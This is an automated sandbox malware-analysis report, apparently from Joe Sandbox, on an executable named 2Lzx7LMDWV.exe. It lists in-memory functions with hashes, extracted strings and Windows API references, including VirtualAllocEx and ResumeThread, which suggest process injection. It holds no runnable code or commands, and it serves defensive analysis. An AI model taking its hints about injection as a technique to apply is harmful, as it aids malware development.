Snapshot File: hcaresult_0_2_5140000_2Lzx7LMDWV.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: a8e5b00561724b0af94307fea954ab4c79b580feee25b1c44e8daa0f64030bda
Instruction ID: beaa19efea0750266c9ba86d557c4a5340ba10292b0958a1fccc8f1164000547
Opcode Fuzzy Hash: a8e5b00561724b0af94307fea954ab4c79b580feee25b1c44e8daa0f64030bda
Instruction Fuzzy Hash: BA1167B69002498FDB10DFA9C945BDEBFF5EF48320F24881AE519A7250C7799944CFA4

Function 05147600 Relevance: 1.6, APIs: 1, Instructions: 53memoryCOMMON

Download Yara Rule

APIs

VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 0514766E

Memory Dump Source

Source File: 00000000.00000002.1723345637.0000000005140000.00000040.00000800.00020000.00000000.sdmp, Offset: 05140000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5140000_2Lzx7LMDWV.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 43fd56d3f5c90be067ce90450a8c266d615264db6e517963430de399101bfe7e
Instruction ID: 726ecb06101b6b55cb069a3db9c23afc418f098a2ecf01902bba12f4ac36c0f8
Opcode Fuzzy Hash: 43fd56d3f5c90be067ce90450a8c266d615264db6e517963430de399101bfe7e
Instruction Fuzzy Hash: F81137B19002499FDB10DFAAC844BDEFFF5EF88324F108419E559A7250C775A944CFA4

Function 05147470 Relevance: 1.6, APIs: 1, Instructions: 51threadCOMMON

Download Yara Rule

APIs

ResumeThread.KERNELBASE ref: 051474DA

Memory Dump Source

Source File: 00000000.00000002.1723345637.0000000005140000.00000040.00000800.00020000.00000000.sdmp, Offset: 05140000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5140000_2Lzx7LMDWV.jbxd

Similarity

API ID: ResumeThread
String ID:
API String ID: 947044025-0
Opcode ID: 6f2d42a31deb1a01f4014658040136cf8a19842b491d104879640466e210777d
Instruction ID: 8b0f2e14284e2fa22c2b9a40b5cdcb7e02e7e018fd17ab2d1212c93eaf605a20
Opcode Fuzzy Hash: 6f2d42a31deb1a01f4014658040136cf8a19842b491d104879640466e210777d
Instruction Fuzzy Hash: 661158B1D002498FDB20DFA9C5447EEFFF5EB88324F24841AC459A7250C774A945CFA4

Function 05147478 Relevance: 1.5, APIs: 1, Instructions: 49threadCOMMON

Download Yara Rule

APIs

ResumeThread.KERNELBASE ref: 051474DA

Memory Dump Source

Source File: 00000000.00000002.1723345637.0000000005140000.00000040.00000800.00020000.00000000.sdmp, Offset: 05140000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5140000_2Lzx7LMDWV.jbxd

Similarity

API ID: ResumeThread
String ID:
API String ID: 947044025-0
Opcode ID: 86fe2932d414eb9af7b913b93ad41487a69438a6a33b29b726a57eb9a1e772c6
Instruction ID: 26e16c73b2a0cf418831390a8fb02ad1a7a8e5d761b8d3dbad8bbf14516b88c3
Opcode Fuzzy Hash: 86fe2932d414eb9af7b913b93ad41487a69438a6a33b29b726a57eb9a1e772c6
Instruction Fuzzy Hash: 42113AB1D002498FDB10DFAAC4457EEFFF4EB88324F248419D559A7250CB75A945CF94

Function 009FB0D8 Relevance: 1.5, APIs: 1, Instructions: 47COMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNELBASE(00000000), ref: 009FB13E

Memory Dump Source

Source File: 00000000.00000002.1719147032.00000000009F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 009F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9f0000_2Lzx7LMDWV.jbxd

Similarity

API ID: HandleModule
String ID:
API String ID: 4139908857-0
Opcode ID: 964411090d9c3ff54a95ba8f38366a10ecbd3072a0edafd719534a2c2fe631bd
Instruction ID: 7fd581784cc7a372a04540eff7938a3398cd37663c9969999559d0400acd42a6
Opcode Fuzzy Hash: 964411090d9c3ff54a95ba8f38366a10ecbd3072a0edafd719534a2c2fe631bd
Instruction Fuzzy Hash: 2811E0B5D003498FDB10CF9AD844ADEFBF8EB88324F10842AD559A7210D375A545CFA5

Function 05148710 Relevance: 1.5, APIs: 1, Instructions: 47windowCOMMON

Download Yara Rule

APIs

PostMessageW.USER32(?,00000010,00000000,?), ref: 0514A4C5

Memory Dump Source

Source File: 00000000.00000002.1723345637.0000000005140000.00000040.00000800.00020000.00000000.sdmp, Offset: 05140000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5140000_2Lzx7LMDWV.jbxd

Similarity

API ID: MessagePost
String ID:
API String ID: 410705778-0
Opcode ID: cc0063b2dad89d9f1cae39d32ec370da5ff76eef0c4d78737c8dd1a0ead1f2a3
Instruction ID: c2031ef5d7f0aa82ce947f6d4fc17f1e19d20595d7ef73b60e6f8df5986ed333
Opcode Fuzzy Hash: cc0063b2dad89d9f1cae39d32ec370da5ff76eef0c4d78737c8dd1a0ead1f2a3
Instruction Fuzzy Hash: 011103B5800348DFDB10DF9AC989BDEBBF8FB48320F14841AE558A7200D375A944CFA5

Function 0514A460 Relevance: 1.5, APIs: 1, Instructions: 44windowCOMMON

Download Yara Rule

APIs

PostMessageW.USER32(?,00000010,00000000,?), ref: 0514A4C5

Memory Dump Source

Source File: 00000000.00000002.1723345637.0000000005140000.00000040.00000800.00020000.00000000.sdmp, Offset: 05140000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5140000_2Lzx7LMDWV.jbxd

Similarity

API ID: MessagePost
String ID:
API String ID: 410705778-0
Opcode ID: af1aae3a523dcde8dcb7129df3ddf499182bae404604ea683aefdb0be6f68cdc
Instruction ID: 2f3ff9ba344fe1c6f29a578fd889dd7a0b6532a733dc4ec3e47f92607ce13012
Opcode Fuzzy Hash: af1aae3a523dcde8dcb7129df3ddf499182bae404604ea683aefdb0be6f68cdc
Instruction Fuzzy Hash: E511F2B5800248CFDB10CF99C989BDEBBF4EF48320F14885AD558A7600C375A944CFA1

Function 0098D3D8 Relevance: .1, Instructions: 75COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1718019917.000000000098D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0098D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_98d000_2Lzx7LMDWV.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2639ecd1a4f487848bc9330294de64973138b51553b932ce0466ad7efb330c21
Instruction ID: 0d218b61343a514c6d8cbf002dfed8352fbba3e84fcbe1b2855e03273e179472
Opcode Fuzzy Hash: 2639ecd1a4f487848bc9330294de64973138b51553b932ce0466ad7efb330c21
Instruction Fuzzy Hash: 37212871500204DFDB05EF24D9C0B26BF69FB94324F20C569D9094B3E6C33AE856C7A1

Function 0098D4C4 Relevance: .1, Instructions: 75COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1718019917.000000000098D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0098D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_98d000_2Lzx7LMDWV.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: aaf95585ba8220fa108b53cadd612a1147a7df50d8cc38f91afb1dffb6ac5b1f
Instruction ID: 6b4be670874afbfacc8018e10eb7f760a02556348f304e3e4c753bf84d4baa7a
Opcode Fuzzy Hash: aaf95585ba8220fa108b53cadd612a1147a7df50d8cc38f91afb1dffb6ac5b1f
Instruction Fuzzy Hash: 2221C171505240DFDB05EF14D980F26BF65FB98318F24C56AE9094A39AC33AD856CBA1

Function 0099D01C Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1718347349.000000000099D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0099D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_99d000_2Lzx7LMDWV.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2d838e46078ea7b87d4dd9b6278415388b9af336665133fb48b031c21c341b28
Instruction ID: db115e86e47775a99e2bb9ae61379b3ed41951b4b0116649cad5a86972b6f925
Opcode Fuzzy Hash: 2d838e46078ea7b87d4dd9b6278415388b9af336665133fb48b031c21c341b28
Instruction Fuzzy Hash: 3A21F271604200DFDF14DF28D9C4B26BBA5FB98314F24C969D84A4B296C33BD847CA61

Function 0099D1D4 Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1718347349.000000000099D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0099D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_99d000_2Lzx7LMDWV.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a2c724f12380cda2090247ebdf8e53f88d453b91ab233c60bcde5f00d3cb5978
Instruction ID: e8dea7e3599b384330e39f5ebb83059436ad4368f430d0299e7a520011a05f8c
Opcode Fuzzy Hash: a2c724f12380cda2090247ebdf8e53f88d453b91ab233c60bcde5f00d3cb5978
Instruction Fuzzy Hash: DC212671504200EFDF05DF18DAC0B2ABBA9FB94314F20CA6DE9094B296C33AD846CB61

Function 0099D006 Relevance: .1, Instructions: 62COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1718347349.000000000099D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0099D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_99d000_2Lzx7LMDWV.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b0f3bbd2f5edca58883f8d2c80465efc9cf5b10ce80715f4c6ceff05a7acde5b
Instruction ID: 850d14cf27e75906a573e7d5ba01a36a1cdcc973a40967ae3e8fc063803de788
Opcode Fuzzy Hash: b0f3bbd2f5edca58883f8d2c80465efc9cf5b10ce80715f4c6ceff05a7acde5b
Instruction Fuzzy Hash: 39215E755093808FDB12CF24D9D4715BF71EB56314F28C5EAD8498F6A7C33A980ACB62

Function 0098D3D3 Relevance: .1, Instructions: 56COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1718019917.000000000098D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0098D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_98d000_2Lzx7LMDWV.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 201b50b495cf87aa99c5283e85c62261d36f592a674eeeb3b47fc5aac64b1fd2
Instruction ID: 03a9421dfa1ced560d828fc9643631a366ca697ff249a461a590209f1c60dc62
Opcode Fuzzy Hash: 201b50b495cf87aa99c5283e85c62261d36f592a674eeeb3b47fc5aac64b1fd2
Instruction Fuzzy Hash: 3B11E172404240DFDB02DF10D5C4B16BF72FB94324F24C2A9D8090B3A6C33AE85ACBA1

Function 0098D4BF Relevance: .1, Instructions: 56COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1718019917.000000000098D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0098D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_98d000_2Lzx7LMDWV.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 201b50b495cf87aa99c5283e85c62261d36f592a674eeeb3b47fc5aac64b1fd2
Instruction ID: ec7c23e9c81083cf06f9bffea725b74a898947c80c3532c119f9eabcbe1c9a31
Opcode Fuzzy Hash: 201b50b495cf87aa99c5283e85c62261d36f592a674eeeb3b47fc5aac64b1fd2
Instruction Fuzzy Hash: 61110372404280CFCB02DF10D5C4B16BF71FB94318F24C6AAE8090B75AC336D85ACBA1

Function 0099D1CF Relevance: .1, Instructions: 53COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1718347349.000000000099D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0099D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_99d000_2Lzx7LMDWV.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 48042a67946fd5b471a152cae87ddc5a96e5ad52caa5f07da488830fbc7c129d
Instruction ID: d68d71861e3c40c46f3cad03cd7d6f6503d32b6177b4ddba4461d3f8a84b681f
Opcode Fuzzy Hash: 48042a67946fd5b471a152cae87ddc5a96e5ad52caa5f07da488830fbc7c129d
Instruction Fuzzy Hash: 98118B75504280DFDB16CF14D5C4B19BBA1FB94314F24C6AAD8494B696C33AD84ACB61

Non-executed Functions

Function 05144D08 Relevance: .3, Instructions: 312COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1723345637.0000000005140000.00000040.00000800.00020000.00000000.sdmp, Offset: 05140000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5140000_2Lzx7LMDWV.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 589c9798ac8848b5338beb1c7c92b8921bc1c8c03ba52a3046ad5511d522b253
Instruction ID: fcfc26789cdb749bc3dff908f41fd49bb7275ac4169500dfbda8bf5a1fccbef3
Opcode Fuzzy Hash: 589c9798ac8848b5338beb1c7c92b8921bc1c8c03ba52a3046ad5511d522b253
Instruction Fuzzy Hash: F2E1FA74E041198FDB14DFA9C5809AEFBF2BF89304F249169E419AB35AD731AD42CF60

Function 05145578 Relevance: .3, Instructions: 312COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1723345637.0000000005140000.00000040.00000800.00020000.00000000.sdmp, Offset: 05140000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5140000_2Lzx7LMDWV.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 241a461fed32746cc6dbef95f6564d1be9fa1f7a0062c5f685b90911ab1bd6c1
Instruction ID: 26b6f62a9b082946f32f2f1c2f82c36bdd9c42571d6abdf4f73155859987d8da
Opcode Fuzzy Hash: 241a461fed32746cc6dbef95f6564d1be9fa1f7a0062c5f685b90911ab1bd6c1
Instruction Fuzzy Hash: 75E1FA74E041198FDB14DFA9C5809AEFBF2BF89305F259169E414AB356DB30AD42CFA0

Function 05146C50 Relevance: .3, Instructions: 312COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1723345637.0000000005140000.00000040.00000800.00020000.00000000.sdmp, Offset: 05140000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5140000_2Lzx7LMDWV.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 88acce5639d1a6acd00e1475787ea34f52c9f5cca568ad4897ab86286d8ba2f0
Instruction ID: fa73cb4f14a925632180d4f6a46c842a88af1984ba711cc4b06df468e57f4bf4
Opcode Fuzzy Hash: 88acce5639d1a6acd00e1475787ea34f52c9f5cca568ad4897ab86286d8ba2f0
Instruction Fuzzy Hash: 99E1F674E041198FDB14DFA9C5909AEFBF2BF89304F249169E418AB35AD731AD42CF60

Function 05145140 Relevance: .3, Instructions: 312COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1723345637.0000000005140000.00000040.00000800.00020000.00000000.sdmp, Offset: 05140000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5140000_2Lzx7LMDWV.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 44be6939ec3447064044f6a9f11f7f053d42ed02f873a3ba7ca1ea1ba54f8ee0
Instruction ID: b8be66535aa6000544352b5bcafc0c4accbfaa6ff08a1d8c22d502aaa9d154dd
Opcode Fuzzy Hash: 44be6939ec3447064044f6a9f11f7f053d42ed02f873a3ba7ca1ea1ba54f8ee0
Instruction Fuzzy Hash: EEE1F774E042198FDB14DFA9C5809AEFBF2BF89304F259169E419AB356D730AD42CF60

Function 05146818 Relevance: .3, Instructions: 312COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1723345637.0000000005140000.00000040.00000800.00020000.00000000.sdmp, Offset: 05140000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5140000_2Lzx7LMDWV.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 474706d192955b1fac29b6ddd6e810d5fa4e17ec67dbd600f290509aeb1842f2
Instruction ID: e15fadebb3885bf3b5a12aa904470afdbd124a17257580316f899eb5127e2d83
Opcode Fuzzy Hash: 474706d192955b1fac29b6ddd6e810d5fa4e17ec67dbd600f290509aeb1842f2
Instruction Fuzzy Hash: 7EE1E674E042198FDB14DFA9C5809AEBBF2BF89304F249169E419AB356D731AD42CF60

Function 009FDD7C Relevance: .3, Instructions: 264COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1719147032.00000000009F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 009F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9f0000_2Lzx7LMDWV.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e0f168f3858512534cb283dfb2232c5c09908d66fec22ced6e91a46d71e5445c
Instruction ID: 043bd70ee7c90380be424c46edd75e2c7ebb4342994005d09b586f66fc63fed8
Opcode Fuzzy Hash: e0f168f3858512534cb283dfb2232c5c09908d66fec22ced6e91a46d71e5445c
Instruction Fuzzy Hash: 8CA17D32E002098FCF05DFB5C9546AEB7B6FF85300B2585BAE905AB265DB71ED15CB80

Function 05145568 Relevance: .1, Instructions: 133COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1723345637.0000000005140000.00000040.00000800.00020000.00000000.sdmp, Offset: 05140000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5140000_2Lzx7LMDWV.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e825ba00f92b21fa4dbde22b5a339ed60cd5899008f986d09a139415d10cad66
Instruction ID: ed7e026059b111ad6e019fb8ae6c57e6531203dd2a0182956deb18a4bcbbfb4a
Opcode Fuzzy Hash: e825ba00f92b21fa4dbde22b5a339ed60cd5899008f986d09a139415d10cad66
Instruction Fuzzy Hash: 2B51FA74E042198FDB14DFA9C5809AEBBF3BF89304F249169D418AB356D7309D42CFA1

Function 05145131 Relevance: .1, Instructions: 132COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1723345637.0000000005140000.00000040.00000800.00020000.00000000.sdmp, Offset: 05140000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5140000_2Lzx7LMDWV.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4428994b88479f959918e6f80801ed40dec3dcd13258f573c00160ed3843c35b
Instruction ID: 2bbfb83191ab72f3947819867093fb328f7cc974c77654804308e6c9eaa6f1ec
Opcode Fuzzy Hash: 4428994b88479f959918e6f80801ed40dec3dcd13258f573c00160ed3843c35b
Instruction Fuzzy Hash: DA51F874E042198FDB15CFA9D5809AEBBF3BF89304F24916AD418AB216D7309D46CF61

Analysis Process: 2Lzx7LMDWV.exePID: 7620, Parent PID: 7416COMMON

Executed Functions

Function 02CC9DE0 Relevance: 6.1, Strings: 4, Instructions: 1126COMMON

Download Yara Rule

Strings

4'^q, xrefs: 02CC9F0C
4'^q, xrefs: 02CC9E04
(o^q, xrefs: 02CCA518
4'^q, xrefs: 02CCAB13

Memory Dump Source

Source File: 00000004.00000002.4145272240.0000000002CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02CC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2cc0000_2Lzx7LMDWV.jbxd

Similarity

API ID:
String ID: (o^q$4'^q$4'^q$4'^q
API String ID: 0-183542557
Opcode ID: 33e81103922ca884f2eccc4b6ff53de0d45e070fcb3395382281ff775868786d
Instruction ID: 4e0f6d951783016036a3e19e011e2b3f6f937657745ad90ce1b2fd547301aace
Opcode Fuzzy Hash: 33e81103922ca884f2eccc4b6ff53de0d45e070fcb3395382281ff775868786d
Instruction Fuzzy Hash: 9CA28E71A00609DFCB15CFA8C988AAEBBF2BF88314F25856DE405DB365D735E981CB50

Function 02CC7118 Relevance: 5.3, Strings: 4, Instructions: 349COMMON

Download Yara Rule

Strings

(o^q, xrefs: 02CC7220
,bq, xrefs: 02CC7298
(o^q, xrefs: 02CC7212
,bq, xrefs: 02CC728A

Memory Dump Source

Source File: 00000004.00000002.4145272240.0000000002CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02CC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2cc0000_2Lzx7LMDWV.jbxd

Similarity

API ID:
String ID: (o^q$(o^q$,bq$,bq
API String ID: 0-879173519
Opcode ID: 2134666543846655ddf0ba75510ab68126f3900abc1d6c78537548797f207d48
Instruction ID: 39f73604585ffa6798928b81c317e23bcbe321669eff719c50772238f6de265b
Opcode Fuzzy Hash: 2134666543846655ddf0ba75510ab68126f3900abc1d6c78537548797f207d48
Instruction Fuzzy Hash: F8E12C30A00119DFCB15CFA9C984AADFBBAFF88314F698469E815AB365D730E945CF50

Function 02CC69A0 Relevance: 3.0, Strings: 2, Instructions: 515COMMON

Download Yara Rule

Strings

(o^q, xrefs: 02CC6EDA
Hbq, xrefs: 02CC6DA6

Memory Dump Source

Source File: 00000004.00000002.4145272240.0000000002CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02CC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2cc0000_2Lzx7LMDWV.jbxd

Similarity

API ID:
String ID: (o^q$Hbq
API String ID: 0-662517225
Opcode ID: 510852216209067ba78e1bc33335cf0614c6c812d5c807dd3e6600fd90f1d5c2
Instruction ID: 46e3281c6a6fa7f7db9c1bd203d6535f5cc83b763f8728191a7a4e597fff1243
Opcode Fuzzy Hash: 510852216209067ba78e1bc33335cf0614c6c812d5c807dd3e6600fd90f1d5c2
Instruction Fuzzy Hash: 42126C70A002199FCB14DF69C954BAEBBFABFC8304F24856DE5099B391DF309945CB90

Function 02CC6498 Relevance: 2.7, Strings: 2, Instructions: 232COMMON

Download Yara Rule

Strings

,bq, xrefs: 02CC656E
,bq, xrefs: 02CC6578

Memory Dump Source

Source File: 00000004.00000002.4145272240.0000000002CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02CC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2cc0000_2Lzx7LMDWV.jbxd

Similarity

API ID:
String ID: ,bq$,bq
API String ID: 0-2699258169
Opcode ID: 9985ff2aa20b505f6c43794cf5712dd76195c7a073fa9e999879ec6281a196e8
Instruction ID: 1c4709b6e85ff1cb9032503addc40cdebee39888ddfce4c2826eedc7609cf8e1
Opcode Fuzzy Hash: 9985ff2aa20b505f6c43794cf5712dd76195c7a073fa9e999879ec6281a196e8
Instruction Fuzzy Hash: 25819F34A00505DFCB14EF69C684AAABBFABFC9308B35816DD505DB3A5DB31E841CB51

Function 02CCC146 Relevance: 2.7, Strings: 2, Instructions: 224COMMON

Download Yara Rule

Strings

PH^q, xrefs: 02CCC400
PH^q, xrefs: 02CCC3EF

Memory Dump Source

Source File: 00000004.00000002.4145272240.0000000002CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02CC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2cc0000_2Lzx7LMDWV.jbxd

Similarity

API ID:
String ID: PH^q$PH^q
API String ID: 0-1598597984
Opcode ID: 9754031c2222bc86b6e5a95dd251678183793309936a78a02567ea63e2f4efc7
Instruction ID: e2ced66920843fa14dafa1d56eb07dbc63e2364495c2bea6101c6cc64a0341b1
Opcode Fuzzy Hash: 9754031c2222bc86b6e5a95dd251678183793309936a78a02567ea63e2f4efc7
Instruction Fuzzy Hash: 81A1E774E00258CFDB14DFAAD884A9DBBF2BF89300F25806AE409EB365DB319945CF54

Function 02CC5362 Relevance: 2.7, Strings: 2, Instructions: 192COMMON

Download Yara Rule

Strings

PH^q, xrefs: 02CC55D9
PH^q, xrefs: 02CC55C8

Memory Dump Source

Source File: 00000004.00000002.4145272240.0000000002CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02CC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2cc0000_2Lzx7LMDWV.jbxd

Similarity

API ID:
String ID: PH^q$PH^q
API String ID: 0-1598597984
Opcode ID: a422c41507075789592f3f2a83a018408dd5dab435c63519834a467b5e4df2c4
Instruction ID: 281df9a5d9855abf79b5a9b9a8f2a47ccbb92a21cf9fdefb718d45c2a7c97822
Opcode Fuzzy Hash: a422c41507075789592f3f2a83a018408dd5dab435c63519834a467b5e4df2c4
Instruction Fuzzy Hash: 7981A374E002188FDB14DFAAD984A9DBBF2BF89300F25D069E409BB365DB34A945CF50

Function 02CCC468 Relevance: 2.7, Strings: 2, Instructions: 187COMMON

Download Yara Rule

Strings

PH^q, xrefs: 02CCC6BF
PH^q, xrefs: 02CCC6D0

Memory Dump Source

Source File: 00000004.00000002.4145272240.0000000002CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02CC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2cc0000_2Lzx7LMDWV.jbxd

Similarity

API ID:
String ID: PH^q$PH^q
API String ID: 0-1598597984
Opcode ID: 49ca6f745674039c3b1c3c9c7e9b1ce5073fc9608d8102c42d7f47b20b5900d7
Instruction ID: 751d4c7cbe4172e695efb98257f6124315e6fd09c107c0d66d042b8b72a16394
Opcode Fuzzy Hash: 49ca6f745674039c3b1c3c9c7e9b1ce5073fc9608d8102c42d7f47b20b5900d7
Instruction Fuzzy Hash: 2F81B674E00258CFDB14DFAAD984A9DBBF2BF88310F24D06AE419AB355DB349945CF50

Function 02CCCA08 Relevance: 2.7, Strings: 2, Instructions: 187COMMON

Download Yara Rule

Strings

PH^q, xrefs: 02CCCC70
PH^q, xrefs: 02CCCC5F

Memory Dump Source

Source File: 00000004.00000002.4145272240.0000000002CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02CC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2cc0000_2Lzx7LMDWV.jbxd

Similarity

API ID:
String ID: PH^q$PH^q
API String ID: 0-1598597984
Opcode ID: 9fb905789d2c62e14b0b63a4ac1b5617d8f305268195aa6e294e3b67e5db4985
Instruction ID: 17e075d6069fa36fc58390dd9e095db427a2a38cf6675266bdd6fa642d2b91cb
Opcode Fuzzy Hash: 9fb905789d2c62e14b0b63a4ac1b5617d8f305268195aa6e294e3b67e5db4985
Instruction Fuzzy Hash: 2181A774E00618CFDB14DFAAD994A9DBBF2BF89300F24D06AE419AB365DB309945CF50

Function 02CCCFAA Relevance: 2.7, Strings: 2, Instructions: 186COMMON

Download Yara Rule

Strings

PH^q, xrefs: 02CCD210
PH^q, xrefs: 02CCD1FF

Memory Dump Source

Source File: 00000004.00000002.4145272240.0000000002CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02CC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2cc0000_2Lzx7LMDWV.jbxd

Similarity

API ID:
String ID: PH^q$PH^q
API String ID: 0-1598597984
Opcode ID: e0d9c00c2d5402cfd08c7cf76aa20f67733f8e6fc90011c0bd89b89d1c3bf7e7
Instruction ID: 45b8ff851151184ec768bd360cfffaff8b3d4dfa510603f45acfc0e3dbdef90b
Opcode Fuzzy Hash: e0d9c00c2d5402cfd08c7cf76aa20f67733f8e6fc90011c0bd89b89d1c3bf7e7
Instruction Fuzzy Hash: E281A774E00218DFDB14DFAAD984A9DBBF2BF89310F24D069E419AB365DB309985CF50

Function 02CCCCD8 Relevance: 2.7, Strings: 2, Instructions: 186COMMON

Download Yara Rule

Strings

PH^q, xrefs: 02CCCF40
PH^q, xrefs: 02CCCF2F

Memory Dump Source

Source File: 00000004.00000002.4145272240.0000000002CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02CC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2cc0000_2Lzx7LMDWV.jbxd

Similarity

API ID:
String ID: PH^q$PH^q
API String ID: 0-1598597984
Opcode ID: c02f315681565fcf7af1fbc03f7ec4250d95f76c7059717e3b95856c127fbbee
Instruction ID: 2f2131b2bb58f63b9c7bf4bdcc3ee18490d70800f68ffc0c05e2139dbe4f1016
Opcode Fuzzy Hash: c02f315681565fcf7af1fbc03f7ec4250d95f76c7059717e3b95856c127fbbee
Instruction Fuzzy Hash: B181C7B4E00258DFDB14DFAAD984A9DBBF2BF89300F24D06AE419AB365DB305945CF50

Function 02CCD278 Relevance: 2.7, Strings: 2, Instructions: 184COMMON

Download Yara Rule

Strings

PH^q, xrefs: 02CCD4CF
PH^q, xrefs: 02CCD4E0

Memory Dump Source

Source File: 00000004.00000002.4145272240.0000000002CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02CC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2cc0000_2Lzx7LMDWV.jbxd

Similarity

API ID:
String ID: PH^q$PH^q
API String ID: 0-1598597984
Opcode ID: df94f9afbbd7c178e1692ab89d75a5d8c217c63570ef1903d1d28ae65d557c5a
Instruction ID: 69f2e77b64e7b969e67abf58e4a1141f176c6f1cd7ecd9b335d7b0c4233aeff0
Opcode Fuzzy Hash: df94f9afbbd7c178e1692ab89d75a5d8c217c63570ef1903d1d28ae65d557c5a
Instruction Fuzzy Hash: B481A674E00258CFDB18DFAAD984A9DBBF2BF89300F24C069E519AB365DB309945CF50

Function 02CCC738 Relevance: 2.7, Strings: 2, Instructions: 180COMMON

Download Yara Rule

Strings

PH^q, xrefs: 02CCC9A0
